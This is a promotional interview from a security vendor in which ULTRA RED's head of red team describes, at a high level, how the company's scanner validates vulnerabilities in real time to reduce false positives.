.jpg)
Breaking the False Positive Curse: Inside ULTRA RED's Research Team
An exclusive interview with Eddie Zaltsman, Head of Red Team at ULTRA RED
False positives are one of the biggest challenges facing security teams today. SOC analysts are forced to sift through thousands of alerts, most of which turn out to be noise rather than genuine threats. But what if we told you there's a way to achieve less than 1% false positives while catching the vulnerabilities that really matter?
At ULTRA RED, that’s not a hypothetical - it’s the standard.
We sat down with Eddie Zaltsman, Head of Red Team, to uncover how ULTRA RED’s research team makes it possible. In part one of this two-part series, Eddie shares how his team tackles false positives head-on, leverages AI to drive precision, and turns innovative security research into real-world protection.
So Eddie, let's start with the elephant in the room – false positives. They're everywhere in cybersecurity. How did your team tackle this seemingly impossible problem?
You're absolutely right, false positives are a massive pain point across the industry. What we realized early on is that traditional vulnerability scanners rely too heavily on static checks. They're essentially making educated guesses based on responses, but they're not actually validating whether the vulnerability is real and exploitable.
Our breakthrough came when we implemented what I call our "runtime validation mechanism." Instead of just flagging potential issues, we actually test them in real time during the scan itself to confirm whether a vulnerability is truly exploitable. Think of it like the difference between a doctor saying "you might have a broken bone based on your symptoms" versus actually taking an X-ray to confirm it.
That sounds incredibly complex. Can you walk us through how this actually works in practice?
Absolutely. Traditional vulnerability scanners tend to focus on static checks, matching patterns, versions, or signatures, and assume that if something might be exploitable, it is. That’s where false positives creep in.
At ULTRA RED, we validate every signal in real time during the scan. Take an SQL injection as an example: instead of blindly injecting payloads and hoping for a reaction, we craft inputs designed to trigger deterministic behavior and confirm the vulnerability through measurable outcomes like timing, logic changes, or specific response anomalies. The same tailored approach applies to XSS, RCE, and dozens of other vectors, each with its own custom validation logic.
If a vulnerability can’t be confirmed through these targeted, controlled tests, it doesn’t make the cut. That’s why our findings are not just accurate, but actionable.
How is your detection engine different from other dynamic scanners and DAST tools out there?
Great question. On the surface, many scanners will list similar “advanced” capabilities. The difference is in how well each one is implemented and how consistently it performs in the real world. Doing all of these things well, at scale, is far from trivial.
Our detection engine follows a number of core principles, including:
- Context-Aware Crawling: We don’t just follow links blindly. The engine is capable of simulating human-like interactions, intelligently navigating single-page applications, handling modals, and interpreting dynamic DOM changes. Coupled with its deep understanding of API and WebSocket communications, both capabilities form the foundation for intelligent input fuzzing, dynamically generating payloads based on inferred input types, allowing us to reach deep parts of the application that other scanners miss entirely.
- Adaptive Payload Mutation: When a payload gets filtered or blocked, the engine doesn’t stop, it adapts. We dynamically mutate payloads based on the responses we see, including WAF behavior, so we can bypass defenses that would stump less sophisticated tools.
- Proof-of-Exploit Validation: Every confirmed finding includes safe, reproducible proof that it’s truly exploitable. This is critical for prioritization and remediation: you’re not just taking our word for it; you see the evidence.
The magic isn’t just that we tick these boxes. It’s that each capability is engineered for depth, accuracy, and efficiency. Many tools claim these features; few deliver them at the level required to consistently find the vulnerabilities that matter, without drowning teams in noise.
How do you keep innovating in such a fast-moving space?
It starts with the people. We hire researchers who live and breathe cybersecurity. They’re obsessing over every exploit technique, diving into threat intel, and trying to break things creatively.
Red teaming plays a huge role. There have been countless times where we've developed new detection modules or refined existing ones based on obstacles we encountered during red team exercises. It's this constant feedback loop between our research, our scanning technology, and real-world application that keeps us sharp.
Let's talk about AI integration. How are you leveraging artificial intelligence to enhance your detection capabilities?
AI is our silent workhorse. On the research side, it helps us process huge datasets: vulnerability disclosures, exploit kits, behavioral anomalies. But the real power comes during scanning. Our AI learns the baseline behavior of applications and flags subtle deviations that might signal something malicious, even if there’s no known signature.
That’s how we catch edge-case vulnerabilities and zero-days before they become mainstream.
How do you make sure all this innovation translates into value for customers?
We don’t innovate for the sake of innovation. Everything we build is shaped by real customer pain. Our team serves as Tier 3 support, so we hear the hard cases, the stuff that breaks tooling or floods inboxes. That feedback feeds directly into our roadmap.
Our customers don’t just get a list of vulnerabilities. They get validated findings, ranked by exploitability, so they can act fast and fix things.
Any advice for other teams trying to reduce false positives?
Validate everything. Detection without validation is just speculation. And while automation is key, it has to be grounded in real-world logic, not assumptions.
Also, never underestimate the human factor. The best tools are built by people who truly understand the attacker’s mindset. Passion, creativity, and curiosity are your biggest assets in this fight.
Stay tuned for Part 2 of our conversation with Eddie, where we'll dive into real-world cases and explore how ULTRA RED discovers critical vulnerabilities that others miss.
Want to learn more about how ULTRA RED can enhance your security posture? Contact our team to see our <1% false positive rate in action.
